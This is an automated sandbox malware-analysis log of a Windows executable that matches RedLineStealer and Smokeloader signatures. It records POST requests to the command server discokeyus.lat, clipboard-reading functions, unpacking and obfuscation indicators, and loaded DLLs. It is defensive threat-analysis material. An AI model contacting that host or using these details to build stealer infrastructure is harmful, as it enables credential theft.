      Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: discokeyus.lat
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: discokeyus.lat
      Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: discokeyus.lat
      Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
      Source: iOnDpwrkWY.exe, 00000000.00000002.1913632237.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, iOnDpwrkWY.exe, 00000000.00000002.1913699245.0000000000B4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/
      Source: iOnDpwrkWY.exe, 00000000.00000002.1913847473.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, iOnDpwrkWY.exe, 00000000.00000003.1787465167.0000000000B7B000.00000004.00000020.00020000.00000000.sdmp, iOnDpwrkWY.exe, 00000000.00000002.1913661847.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, iOnDpwrkWY.exe, 00000000.00000003.1787298196.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, iOnDpwrkWY.exe, 00000000.00000003.1787298196.0000000000B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/api
      Source: iOnDpwrkWY.exe, 00000000.00000003.1787298196.0000000000B61000.00000004.00000020.00020000.00000000.sdmp, iOnDpwrkWY.exe, 00000000.00000002.1913847473.0000000000B64000.00000004.00000020.00020000.00000000.sdmp, iOnDpwrkWY.exe, 00000000.00000003.1787570381.0000000000B63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://discokeyus.lat/api%%
      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
      Source: unknownHTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.8:49704 version: TLS 1.2
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,0_2_004329C0
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,0_2_004329C0

      System Summary

      barindex
      Source: 00000000.00000002.1913597436.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004088500_2_00408850
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004238600_2_00423860
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004388100_2_00438810
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0041682D0_2_0041682D
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004288CB0_2_004288CB
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0043D8800_2_0043D880
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004218A00_2_004218A0
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004309400_2_00430940
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004039700_2_00403970
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004209390_2_00420939
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004179C10_2_004179C1
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004231C20_2_004231C2
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004241C00_2_004241C0
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0043B1D00_2_0043B1D0
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004291DD0_2_004291DD
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0043D9800_2_0043D980
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004059900_2_00405990
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004221900_2_00422190
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0043D9970_2_0043D997
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0043D9990_2_0043D999
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004091B00_2_004091B0
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0042CA490_2_0042CA49
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0042DA530_2_0042DA53
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004162630_2_00416263
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0040EA100_2_0040EA10
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004152200_2_00415220
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0042CAD00_2_0042CAD0
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004252DD0_2_004252DD
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0041B2E00_2_0041B2E0
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004062800_2_00406280
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0043DA800_2_0043DA80
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0041E2900_2_0041E290
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0041CB400_2_0041CB40
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0043D34D0_2_0043D34D
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00426B500_2_00426B50
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0043DB600_2_0043DB60
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00436B080_2_00436B08
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0042830D0_2_0042830D
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0042CB110_2_0042CB11
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004043200_2_00404320
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0042CB220_2_0042CB22
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004253270_2_00425327
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004083300_2_00408330
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0043F3300_2_0043F330
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0042A33F0_2_0042A33F
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0040DBD90_2_0040DBD9
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004243800_2_00424380
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0041FC750_2_0041FC75
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0041DC000_2_0041DC00
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00429C2B0_2_00429C2B
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004291DD0_2_004291DD
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004074F00_2_004074F0
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0040ACF00_2_0040ACF0
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0041148F0_2_0041148F
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0042AC900_2_0042AC90
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0043ECA00_2_0043ECA0
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0040CD460_2_0040CD46
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004375000_2_00437500
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004225100_2_00422510
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00417DEE0_2_00417DEE
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00437DF00_2_00437DF0
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004095800_2_00409580
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0041759F0_2_0041759F
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00425E700_2_00425E70
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00436E740_2_00436E74
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004276030_2_00427603
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00425E300_2_00425E30
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004286C00_2_004286C0
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0043AEC00_2_0043AEC0
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004266D00_2_004266D0
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004236E20_2_004236E2
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00405EE00_2_00405EE0
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0041DE800_2_0041DE80
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00402F500_2_00402F50
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00420F500_2_00420F50
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00438F590_2_00438F59
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004067100_2_00406710
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00423F200_2_00423F20
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0043F7200_2_0043F720
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00419F300_2_00419F30
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0041E7C00_2_0041E7C0
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004197C20_2_004197C2
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0042DFE90_2_0042DFE9
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0040A7800_2_0040A780
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00411F900_2_00411F90
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004187920_2_00418792
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004157990_2_00415799
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0043EFB00_2_0043EFB0
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A0E0E70_2_00A0E0E7
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A160D70_2_00A160D7
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A270DB0_2_00A270DB
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A080550_2_00A08055
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A280570_2_00A28057
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A111B70_2_00A111B7
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A0A1970_2_00A0A197
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A021F70_2_00A021F7
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A2B1270_2_00A2B127
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A131660_2_00A13166
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_009F61470_2_009F6147
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A0D2300_2_00A0D230
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A2F2170_2_00A2F217
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A1E2500_2_00A1E250
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A123F70_2_00A123F7
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A0E4F70_2_00A0E4F7
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_009F64E70_2_009F64E7
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_009F94170_2_009F9417
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A194440_2_00A19444
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_009F85970_2_009F8597
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A2D5B40_2_00A2D5B4
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_009F45870_2_009F4587
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A2F5970_2_00A2F597
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A1351D0_2_00A1351D
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A0B5470_2_00A0B547
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A146870_2_00A14687
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A156940_2_00A15694
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A016F60_2_00A016F6
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_009F97E70_2_009F97E7
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A277670_2_00A27767
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_009F77570_2_009F7757
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A127770_2_00A12777
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A078060_2_00A07806
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A2F9870_2_00A2F987
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_009FA9E70_2_009FA9E7
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A189270_2_00A18927
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A169370_2_00A16937
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_009F69770_2_009F6977
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_009F8AB70_2_009F8AB7
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A0EA270_2_00A0EA27
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A09A290_2_00A09A29
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A28A770_2_00A28A77
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A10BA00_2_00A10BA0
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A20BA70_2_00A20BA7
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_009F3BD70_2_009F3BD7
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_009F5BF70_2_009F5BF7
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A11B070_2_00A11B07
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A1CCB00_2_00A1CCB0
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A1DCBC0_2_00A1DCBC
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_009FEC770_2_009FEC77
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A1CD890_2_00A1CD89
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A1CD370_2_00A1CD37
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A26D6F0_2_00A26D6F
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A1CD780_2_00A1CD78
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A1AEF70_2_00A1AEF7
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A0FEDC0_2_00A0FEDC
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A0CE630_2_00A0CE63
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A0DE670_2_00A0DE67
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_009FDE400_2_009FDE40
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_009FCFAD0_2_009FCFAD
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A06F350_2_00A06F35
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A2EF070_2_00A2EF07
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: String function: 00408030 appears 42 times
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: String function: 00414400 appears 65 times
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: String function: 00A04667 appears 65 times
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: String function: 009F8297 appears 72 times
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 1660
      Source: iOnDpwrkWY.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000000.00000002.1913597436.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: 00000000.00000002.1913417331.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: iOnDpwrkWY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@1/1
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00AF9FB6 CreateToolhelp32Snapshot,Module32First,0_2_00AF9FB6
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00430C70 CoCreateInstance,0_2_00430C70
      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5608
      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\c988261e-d681-44f4-9570-69b05a1b1aabJump to behavior
      Source: iOnDpwrkWY.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: iOnDpwrkWY.exeReversingLabs: Detection: 68%
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeFile read: C:\Users\user\Desktop\iOnDpwrkWY.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\iOnDpwrkWY.exe "C:\Users\user\Desktop\iOnDpwrkWY.exe"
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5608 -s 1660
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeSection loaded: msimg32.dllJump to behavior
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeSection loaded: msvcr100.dllJump to behavior
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeSection loaded: webio.dllJump to behavior
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

      Data Obfuscation

      barindex
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeUnpacked PE file: 0.2.iOnDpwrkWY.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeUnpacked PE file: 0.2.iOnDpwrkWY.exe.400000.0.unpack
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0043D810 push eax; mov dword ptr [esp], 707F7E0Dh0_2_0043D812
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00443469 push ebp; iretd 0_2_0044346C
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0044366E push 9F00CD97h; ret 0_2_004436B1
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_0043AE30 push eax; mov dword ptr [esp], 1D1E1F10h0_2_0043AE3E
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_004477A5 push ebp; iretd 0_2_004477AA
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A2B097 push eax; mov dword ptr [esp], 1D1E1F10h0_2_00A2B0A5
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A2DA77 push eax; mov dword ptr [esp], 707F7E0Dh0_2_00A2DA79
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00A13A79 push esp; iretd 0_2_00A13A7C
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00AFF0BD push ss; retf 0_2_00AFF0AB
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00AFF03A push ss; retf 0_2_00AFF0AB
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00AFCC90 push ebp; ret 0_2_00AFCC93
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00AFACEC push 00000039h; ret 0_2_00AFADC3
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00AFAD7B push 00000039h; ret 0_2_00AFADC3
      Source: C:\Users\user\Desktop\iOnDpwrkWY.exeCode function: 0_2_00AFAD55 push 00000039h; ret 0_2_00AFADC3
      Source: iOnDpwrkWY.exeStatic PE information: section name: .text entropy: 7.3670968220770385
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
